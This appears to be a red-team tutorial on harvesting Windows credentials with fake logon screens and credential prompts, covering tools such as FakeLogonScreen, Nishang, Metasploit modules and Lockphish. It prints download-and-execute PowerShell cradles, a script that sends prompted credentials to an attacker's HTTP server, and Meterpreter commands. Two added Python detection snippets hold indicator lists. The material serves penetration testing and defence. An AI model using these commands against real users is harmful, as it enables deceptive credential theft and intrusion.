Phishing Windows Credentials

It is very common in Windows environments for running programs to require the user to enter his domain credentials for authentication, as with Outlook, approval of elevation of privileges (User Account Control), or simply when Windows is inactive (Lock Screen). Mimicking this Windows behaviour can lead to harvesting credentials of Windows users that could be used for lateral movement during red team assessments. This technique can be useful when an initial foothold has been achieved on the system and the credentials of the user can't be discovered by alternative methods.


Modern red teaming expects tradecraft to be based on the C# language, since it allows in-memory execution by various frameworks such as Cobalt Strike, Covenant, etc. FakeLogonScreen is a Windows utility developed in C# by Arris Huijgen that mimics the Windows logon screen in an attempt to obtain the password of the current user.


The tool can display the background that is currently configured, in order to reduce the risk of security-conscious users spotting this malicious activity.

Windows Fake Logon Screen

When the user enters his password on the fake logon screen, the tool validates it against Active Directory or locally to ensure that the password is correct. The password is displayed in the console.

Fake Logon Screen – Credentials

There is also a secondary binary that is part of the project and stores the credentials in a file (user.db) on the local disk. Specifically, executing the following will read the file that contains the credentials of the domain user.

type C:\Users\pentestlab.PENTESTLAB\AppData\Local\Microsoft\user.db

Fake Logon Screen – Credentials Stored

A similar assembly binary called SharpLocker was developed by Matt Pickford; upon execution it shows a fake logon screen to the user.

SharpLocker – Lock Screen

Every keystroke is captured on the console until the password of the user is fully revealed.

SharpLocker – Password


Windows security input prompts are common, since applications in corporate environments may ask users to authenticate on a regular basis. Microsoft Outlook is one product that often performs this request for credentials in a domain environment. A tool that attempts to mimic a Windows security prompt is CredsLeaker, which requires a web server to store the necessary files that read the credentials and write them to a text file, and PowerShell to invoke the HTTP request. The PowerShell commands can be executed directly from a BAT file.


CredsLeaker – HTTP Delivery

Before execution of the BAT file, the project files should be modified to point to the web server that stores the configuration, PHP and PowerShell files. When the BAT file is executed, a Windows security popup is displayed to the user.

Input Prompt – CredsLeaker

The tool validates the credentials, and the popup disappears only if the supplied credentials are correct. The domain, the host name, the username and the password are written to the following location.


CredsLeaker – Credentials

Matt Nelson developed a PowerShell script that generates an input prompt with the ability to check whether the credentials are valid; otherwise the prompt does not close. The script can be executed from a remote location, and the credentials are displayed in the console.

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('')); Invoke-LoginPrompt

Windows Input Prompt – PowerShell

The Nishang framework also contains a PowerShell script that could be used to create a fake input prompt in order to harvest Windows credentials.

PowerShell – Invoke-CredentialsPhish

The input prompt contains a message to the user that credentials are required to perform this operation. More security-aware users may notice that something has been executed in the background, but this does not apply to all corporate users.

Invoke-CredentialsPhish – Input Prompt

When the credentials of the user are entered into the Windows box, they are displayed back in the console.

PowerShell – Invoke-CredentialsPhish

Alternatively, the script could be executed from a remote location to evade detection.

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('')); Invoke-CredentialsPhish

Shell – Invoke-CredentialsPhish

Rob Fuller described in his blog the attack of capturing Windows credentials using a Metasploit module and PowerShell. Metasploit Framework contains modules that can capture credentials over various protocols (FTP, SMB, HTTP, etc.). The following module can be used to set up a basic HTTP server that requires authentication.

use auxiliary/server/capture/http_basic


PowerShell can be used to deliver the Windows credential phishing attack by creating an input prompt and using the credentials to initiate an HTTP request to the Metasploit server, so that the credentials can be captured.

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('');

The arbitrary input prompt needs to be encoded as UTF-16LE and converted to Base64.

cat popup.txt | iconv -t UTF-16LE

cat popup.txt | iconv -t UTF-16LE | base64 -w0

PowerShell – Input Prompt

Executing the following from a Windows command prompt or a shell will display the fake Windows input prompt to the user.

powershell.exe -ep bypass -enc <base64>

Login Screen – PowerShell
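Because the -enc argument is simply Base64 over UTF-16LE text, a defender can reverse it from process-creation logs and look for the prompt and download calls shown in this article. The following is an added detection example, not part of the original article or of any tool it describes; the indicator list, the sample command lines and the host.example URL are constructed for illustration.

```python
import base64
import binascii

# Substrings taken from the commands shown in this article (lower-cased).
INDICATORS = (
    "promptforcredential",
    "invoke-credentialsphish",
    "invoke-loginprompt",
    "downloadstring",
)

def is_encoded_switch(token):
    """True for -EncodedCommand and the abbreviations PowerShell accepts."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or "encodedcommand".startswith(name)

def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc, or None if absent or undecodable."""
    tokens = cmdline.split()
    for switch, value in zip(tokens, tokens[1:]):
        if not is_encoded_switch(switch):
            continue
        try:
            raw = base64.b64decode(value.strip("'\""), validate=True)
            return raw.decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None

def triage(cmdline):
    """List the indicators present in the command line or its decoded payload."""
    text = (cmdline + "\n" + (decode_encoded_command(cmdline) or "")).lower()
    return [i for i in INDICATORS if i in text]

# Constructed sample input: process-creation command lines (e.g. Event ID 4688).
PROMPT_SCRIPT = "$c = $host.ui.PromptForCredential('Failed Authentication','','CORP\\alice','CORP')"
SAMPLES = [
    "powershell.exe -ep bypass -enc " + base64.b64encode(PROMPT_SCRIPT.encode("utf-16-le")).decode(),
    "powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://host.example/x.ps1')); Invoke-CredentialsPhish",
    "powershell.exe -ep Bypass -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```

Substring matching of this kind is a triage aid for command-line and script-block logs and will not catch obfuscated variants.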

The Metasploit module will receive the request with the credentials.

Metasploit HTTP Server – Capture Authentication
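On the network side, the request described above is visible to a forward proxy as HTTP Basic authentication carrying a domain account to a host outside the organisation. The following is an added detection example, not code from the original article or from Metasploit; the record field names, the internal suffix list and the sample records are hypothetical and constructed for illustration.

```python
import base64
import binascii

# Assumption: hosts that may legitimately receive HTTP Basic authentication.
INTERNAL_SUFFIXES = (".corp.example",)

def basic_auth_user(header_value):
    """Return the username carried by an 'Authorization: Basic' value, else None."""
    scheme, _, blob = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(blob.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, _password = decoded.partition(":")  # the password is never kept
    return user if sep else None

def flag(record):
    """Return the reasons a proxy record looks like phished credentials leaving."""
    user = basic_auth_user(record.get("authorization", ""))
    if user is None or record["host"].lower().endswith(INTERNAL_SUFFIXES):
        return []
    reasons = []
    if "\\" in user or "@" in user:
        reasons.append("domain account sent with Basic auth to external host")
    if record.get("user_agent", "").startswith("Wget/") and record.get("os") == "windows":
        reasons.append("Wget User-Agent from a Windows workstation")
    return reasons

def basic_header(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()

# Constructed proxy records; field names are hypothetical.
RECORDS = [
    {"host": "198.51.100.7", "os": "windows", "authorization": basic_header("CORP\\alice", "x"),
     "user_agent": "Wget/1.9+cvs-stable (Red Hat modified)"},
    {"host": "wiki.corp.example", "os": "windows", "authorization": basic_header("CORP\\bob", "x"),
     "user_agent": "Mozilla/5.0"},
    {"host": "api.vendor.example", "os": "windows", "authorization": "Bearer abc.def",
     "user_agent": "Mozilla/5.0"},
]

if __name__ == "__main__":
    for rec in RECORDS:
        print(rec["host"], flag(rec))
```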


Metasploit Framework contains a module that can spawn an input prompt when a specific process, or any process, is created. The module must be linked to an existing Meterpreter session, and the process needs to be defined.

use post/windows/gather/phish_windows_credentials




Input Prompt – Metasploit Module

The wildcard * instructs the module to monitor all the processes running on the system and wait for new instances to start, in order to display the fake input prompt to the user.

Input Prompt Metasploit – All Processes

The input prompt is displayed to the user as a credential request from the process in order to start.

Windows Input Prompt

When the user enters his credentials, they are captured and displayed back in the console.

Metasploit Module – Credentials

Alternatively, the module can be configured to monitor only for the creation of a specific process.

Metasploit Module – Windows Credentials


Lockphish is another tool with the ability to implement a phishing attack against the Windows logon screen. The associated template is hosted on a PHP server and by default uses YouTube to redirect the user after his credentials have been submitted.


LockPhish – Installation

Social engineering is required in order to trick the user into clicking the direct link that hosts the fake logon screen.

LockPhish – WebPage

A fake logon screen is displayed on the screen of the user that requires the password of the Administrator account. However, compared with other tools that target the lock screen, the alignment of the password field is not accurate, and the fact that it asks for the Administrator account instead of the current user account may alert the user. Furthermore, it does not perform any validation locally or against Active Directory.

LockPhish – Lock Screen

When the user enters his credentials, a redirection to the YouTube website follows.

LockPhish Redirection

The credentials are displayed back in the console.

LockPhish Credentials


Prior to the C# and PowerShell era, this attack was performed from an arbitrary executable. The binary supported two parameters that allowed the penetration tester to specify the target domain and the file name that would store the captured credentials.

execute -f "cmd /c start OUTLOOK.exe pentestlab.local creds.txt"

Outlook Binary

The binary was identified as an Outlook application (Outlook 2010, Outlook 2013) in order to fool the blue team, since it was touching the disk. The input prompt was displayed to the user like the PowerShell-based input prompts.

Outlook – Input Prompt

Credentials were stored in a hidden folder inside %AppData%, and the following commands could be executed from a Meterpreter session to perform the attack and read the captured credentials.

cd %AppData%

upload OUTLOOK.exe

execute -f "cmd /c start OUTLOOK.exe pentestlab.local creds.txt"

cd Local

cd Temp

cat creds.txt
